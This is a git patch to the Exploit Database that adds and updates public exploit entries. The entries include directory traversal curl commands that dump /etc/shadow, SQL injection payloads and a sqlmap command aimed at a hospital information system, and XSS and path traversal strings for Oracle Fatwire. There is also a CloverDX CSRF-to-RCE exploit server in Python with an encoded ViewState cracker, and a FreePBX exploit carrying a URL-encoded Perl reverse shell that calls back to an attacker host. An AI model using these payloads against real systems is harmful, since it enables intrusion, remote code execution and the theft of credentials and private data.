From 8461d963fa28494940b3cd3212f5638de4703269 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 30 Jul 2021 05:01:56 +0000 Subject: [PATCH] DB: 2021-07-30 9 changes to exploits/shellcodes Splinterware System Scheduler Professional 5.30 - Privilege Escalation Denver IP Camera SHO-110 - Unauthenticated Snapshot Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE) Oracle Fatwire 6.3 - Multiple Vulnerabilities --- exploits/aspx/webapps/50164.txt | 95 +++++++++++++++++++ exploits/hardware/webapps/50162.txt | 16 ++++ exploits/hardware/webapps/50163.txt | 81 ++++++++++++++++ exploits/java/webapps/50166.py | 137 ++++++++++++++++++++++++++++ exploits/multiple/webapps/50167.txt | 32 +++++++ exploits/php/webapps/18650.py | 5 +- exploits/php/webapps/50165.txt | 30 ++++++ exploits/windows/local/49858.txt | 49 ---------- files_exploits.csv | 7 +- 9 files changed, 401 insertions(+), 51 deletions(-) create mode 100644 exploits/aspx/webapps/50164.txt create mode 100644 exploits/hardware/webapps/50162.txt create mode 100644 exploits/hardware/webapps/50163.txt create mode 100755 exploits/java/webapps/50166.py create mode 100644 exploits/multiple/webapps/50167.txt create mode 100644 exploits/php/webapps/50165.txt delete mode 100644 exploits/windows/local/49858.txt diff --git a/exploits/aspx/webapps/50164.txt b/exploits/aspx/webapps/50164.txt new file mode 100644 index 000000000..127b6008a --- /dev/null +++ b/exploits/aspx/webapps/50164.txt @@ -0,0 +1,95 @@ +# Exploit Title: IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration +# Date: 03.05.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.eforcesoftware.com + +IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration + + +Vendor: IntelliChoice, Inc. +Product web page: https://www.eforcesoftware.com +Affected version: 2.5.9.6 + 2.5.9.5 + 2.5.9.3 + 2.5.9.2 + 2.5.9.1 + 2.5.8.0 + 2.5.7.20 + 2.5.7.18 + 2.5.6.18 + 2.5.4.6 + 2.5.3.11 + +Summary: IntelliChoice is a United States software company that was +founded in 2003, and offers a software title called eFORCE Software +Suite. eFORCE Software Suite is law enforcement software, and includes +features such as case management, court management, crime scene management, +criminal database, dispatching, evidence management, field reporting, +scheduling, court management integration, certification management, +and incident mapping. With regards to system requirements, eFORCE +Software Suite is available as SaaS, Windows, iPhone, and iPad software. + +Desc: The weakness is caused due to the login script and how it verifies +provided credentials. Attacker can use this weakness to enumerate valid +users on the affected application via 'ctl00$MainContent$UserName' POST +parameter. + +Tested on: Microsoft-IIS/10.0 + Microsoft-IIS/8.5 + ASP.NET/4.0.30319 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5658 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php + + +03.05.2021 + +-- + + +Request/response for existent username: +--------------------------------------- + +POST /eFORCECommand/Account/Login.aspx HTTP/1.1 + +__LASTFOCUS: +__EVENTTARGET: +__EVENTARGUMENT: +__VIEWSTATE: Xxx +__VIEWSTATEGENERATOR: 4A5A1A0F +__EVENTVALIDATION: Xxx +ctl00$MainContent$UserName: eforce +ctl00$MainContent$Password: 123456 +ctl00$MainContent$btnLogin.x: 20 +ctl00$MainContent$btnLogin.y: 7 + + +Response: +Invalid password entered for username eforce. + + + +Request/response for non-existent username: +------------------------------------------- + +POST /eFORCECommand/Account/Login.aspx HTTP/1.1 + +__LASTFOCUS: +__EVENTTARGET: +__EVENTARGUMENT: +__VIEWSTATE: Xxx +__VIEWSTATEGENERATOR: 4A5A1A0F +__EVENTVALIDATION: Xxx +ctl00$MainContent$UserName: testingus +ctl00$MainContent$Password: 123456 +ctl00$MainContent$btnLogin.x: 20 +ctl00$MainContent$btnLogin.y: 7 + + +Response: +Unable to login: User name testingus is not registered. \ No newline at end of file diff --git a/exploits/hardware/webapps/50162.txt b/exploits/hardware/webapps/50162.txt new file mode 100644 index 000000000..08a2d501f --- /dev/null +++ b/exploits/hardware/webapps/50162.txt @@ -0,0 +1,16 @@ +# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot +# Date: 28 July 2021 +# Exploit Author: Ivan Nikolsky (enty8080) +# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826 +# Version: Denver SHO-110 (all firmware versions) +# Tested on: Denver SHO-110 + +Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too. + +So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication. + +It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream. + +PoC: + +http://:8001/snapshot \ No newline at end of file diff --git a/exploits/hardware/webapps/50163.txt b/exploits/hardware/webapps/50163.txt new file mode 100644 index 000000000..c41b944b2 --- /dev/null +++ b/exploits/hardware/webapps/50163.txt @@ -0,0 +1,81 @@ +# Exploit Title: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.ljkj2012.com + +Longjing Technology BEMS API 1.21 Remote Arbitrary File Download + + +Vendor: Longjing Technology +Product web page: http://www.ljkj2012.com +Affected version: 1.21 + +Summary: Battery Energy Management System. + +Desc: The application suffers from an unauthenticated arbitrary +file download vulnerability. Input passed through the fileName +parameter through downloads endpoint is not properly verified +before being used to download files. This can be exploited to +disclose the contents of arbitrary and sensitive files through +directory traversal attacks. + +Tested on: nginx/1.19.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5657 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + + +05.07.2021 + +-- + + +$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow + +root:*:18477:0:99999:7::: +daemon:*:18477:0:99999:7::: +bin:*:18477:0:99999:7::: +sys:*:18477:0:99999:7::: +sync:*:18477:0:99999:7::: +games:*:18477:0:99999:7::: +man:*:18477:0:99999:7::: +lp:*:18477:0:99999:7::: +mail:*:18477:0:99999:7::: +news:*:18477:0:99999:7::: +uucp:*:18477:0:99999:7::: +proxy:*:18477:0:99999:7::: +www-data:*:18477:0:99999:7::: +backup:*:18477:0:99999:7::: +list:*:18477:0:99999:7::: +irc:*:18477:0:99999:7::: +gnats:*:18477:0:99999:7::: +nobody:*:18477:0:99999:7::: +_apt:*:18477:0:99999:7::: + + +$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +_apt:x:100:65534::/nonexistent:/usr/sbin/nologin \ No newline at end of file diff --git a/exploits/java/webapps/50166.py b/exploits/java/webapps/50166.py new file mode 100755 index 000000000..104ba29b7 --- /dev/null +++ b/exploits/java/webapps/50166.py @@ -0,0 +1,137 @@ +# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE) +# Date: 14.04.2021 +# Exploit Author: niebardzo +# Vendor Homepage: https://www.cloverdx.com/ +# Software Link: https://github.com/cloverdx/cloverdx-server-docker +# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x +# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker +# CVE : CVE-2021-29995 + +# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX +# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java. +# Reference for cracking ViewState: +# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html +# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 +# + + +import http.server +import socketserver +import requests +from urllib.parse import urlparse +from urllib.parse import parse_qs +from bs4 import BeautifulSoup +import subprocess +import sys +import json + + +class ExploitHandler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + self.send_response(200) + self.send_header("Content-Type", "text/html; charset=utf-8") + self.end_headers() + + # replace with your own target + target = "http://localhost:8080" + + query_comp = parse_qs(urlparse(self.path).query) + if "target" in query_comp: + target = query_comp["target"][0] + + req = requests.get(target+"/clover/gui/login.jsf") + + if req.status_code != 200: + sys.exit(-1) + + # parse the reponse retrieve the ViewState + soup = BeautifulSoup(req.text, "html.parser") + cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"] + + # Use the ViewstateCracker.java to get new Viewstate. + new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state]) + new_view_state = new_view_state.decode("utf-8").strip() + print(new_view_state) + if new_view_state == "6927638971750518694:6717304323717288036": + html = ("

Hello Clover Admin!


" + + "") + else: + html = ("" + + "" + + "

Hello Clover Admin! Please wait here, content is loading...

" + + "" + + " " + + " " + + " " + + " " + + "" + + "" + + "" + + "" + + "") + + self.wfile.write(bytes(html,"utf-8")) + + +base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg==" + +# +# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 +# + +with open("ViewstateCracker.java","w") as f: + f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8')) + + +exploit_handler = ExploitHandler + +PORT = 6010 + +exploit_server = socketserver.TCPServer(("", PORT), exploit_handler) + +exploit_server.serve_forever() \ No newline at end of file diff --git a/exploits/multiple/webapps/50167.txt b/exploits/multiple/webapps/50167.txt new file mode 100644 index 000000000..d28fb9e26 --- /dev/null +++ b/exploits/multiple/webapps/50167.txt @@ -0,0 +1,32 @@ +# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities +# Date: 29/07/2021 +# Exploit Author: J. Francisco Bolivar @Jfran_cbit +# Vendor Homepage: https://www.oracle.com/index.html +# Version: 6.3 +# Tested on: CentOS + +1. Xss + +Adt parameter is vulnerable to Xss: + +https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt= + +2. Path Traversal + +https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd + +3. Blind Sql injection + +POST +/cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice +HTTP/1.1 +Host: IPaddress + +pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=&command=XX + +The vulnerable parameter is : id_ex (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND +3958=3958&command=xxxxxT \ No newline at end of file diff --git a/exploits/php/webapps/18650.py b/exploits/php/webapps/18650.py index b755d2dff..a322610e9 100755 --- a/exploits/php/webapps/18650.py +++ b/exploits/php/webapps/18650.py @@ -3,7 +3,7 @@ # Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit # Google Dork: oy vey # Date: March 23rd, 2012 -# Author: muts +# Author: muts, SSL update by Emporeo # Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. # Tested on: multiple # CVE : notyet @@ -15,11 +15,14 @@ # http://www.exploit-db.com/exploits/18649 ############################################################ import urllib +import ssl rhost="172.16.254.72" lhost="172.16.254.223" lport=443 extension="1000" +ssl._create_default_https_context = ssl._create_unverified_context + # Reverse shell payload url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' diff --git a/exploits/php/webapps/50165.txt b/exploits/php/webapps/50165.txt new file mode 100644 index 000000000..401b1e621 --- /dev/null +++ b/exploits/php/webapps/50165.txt @@ -0,0 +1,30 @@ +# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection +# Date: 29.07.2021 +# Exploit Author: securityforeveryone.com +# Vendor Homepage: https://care2x.org +# Software Link: https://sourceforge.net/projects/care2002/ +# Version: =< 2.7 Alpha +# Tested on: Linux/Windows +# Researchers : Security For Everyone Team - https://securityforeveryone.com + +DESCRIPTION + +In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters. + +The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php". + +Example: + +/nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= + +if an attacker exploits this vulnerability, attacker may access private data in the database system. + +EXPLOITATION + +# GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1 +# Host: Target + +Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs + +Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl +Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg \ No newline at end of file diff --git a/exploits/windows/local/49858.txt b/exploits/windows/local/49858.txt deleted file mode 100644 index 569b3e977..000000000 --- a/exploits/windows/local/49858.txt +++ /dev/null @@ -1,49 +0,0 @@ -# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation -# Date: 2021-05-11 -# Exploit Author: Andrea Intilangelo -# Vendor Homepage: https://www.splinterware.com -# Software Link: https://www.splinterware.com/download/ssproeval.exe -# Version: 5.30 Professional -# Tested on: Windows 10 Pro 20H2 x64 -# CVE: CVE-2021-31771 - -System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting -where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with -elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System; -renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one -will be executed after a short while. - -C:\Users\test>sc qc WindowsScheduler -[SC] QueryServiceConfig OPERAZIONI RIUSCITE - -NOME_SERVIZIO: WindowsScheduler - TIPO : 10 WIN32_OWN_PROCESS - TIPO_AVVIO : 2 AUTO_START - CONTROLLO_ERRORE : 0 IGNORE - NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe - GRUPPO_ORDINE_CARICAMENTO : - TAG : 0 - NOME_VISUALIZZATO : System Scheduler Service - DIPENDENZE : - SERVICE_START_NAME : LocalSystem - -C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\ -C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W) - BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE) - NT SERVICE\TrustedInstaller:(I)(F) - NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) - NT AUTHORITY\SYSTEM:(I)(F) - NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) - BUILTIN\Administrators:(I)(F) - BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) - BUILTIN\Users:(I)(RX) - BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) - CREATOR OWNER:(I)(OI)(CI)(IO)(F) - AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) - AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE) - AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) - AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE) - -Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file - -C:\Users\test> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 80d4694ee..3df2ca2f5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11339,7 +11339,6 @@ id,file,description,date,author,type,platform,port 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows, 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows, 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows, -49858,exploits/windows/local/49858.txt,"Splinterware System Scheduler Professional 5.30 - Privilege Escalation",2021-05-12,"Andrea Intilangelo",local,windows, 49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 8/11 and WPAD service 'Jscript.dll' - Use-After-Free",2021-05-13,"Forrest Orr",local,windows_x86-64, 49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",2021-05-13,"Forrest Orr",local,windows_x86-64, 49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",2021-05-17,SlidingWindow,local,windows, @@ -44294,3 +44293,9 @@ id,file,description,date,author,type,platform,port 50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",2021-07-27,Shafique_Wasta,webapps,php, 50159,exploits/php/webapps/50159.py,"Event Registration System with QR Code 1.0 - Authentication Bypass & RCE",2021-07-28,"Javier Olmedo",webapps,php, 50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",2021-07-28,"Sedric Louissaint",webapps,windows, +50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",2021-07-29,"Ivan Nikolsky",webapps,hardware, +50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",2021-07-29,LiquidWorm,webapps,hardware, +50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",2021-07-29,LiquidWorm,webapps,aspx, +50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",2021-07-29,securityforeveryone.com,webapps,php, +50166,exploits/java/webapps/50166.py,"CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)",2021-07-29,niebardzo,webapps,java, +50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,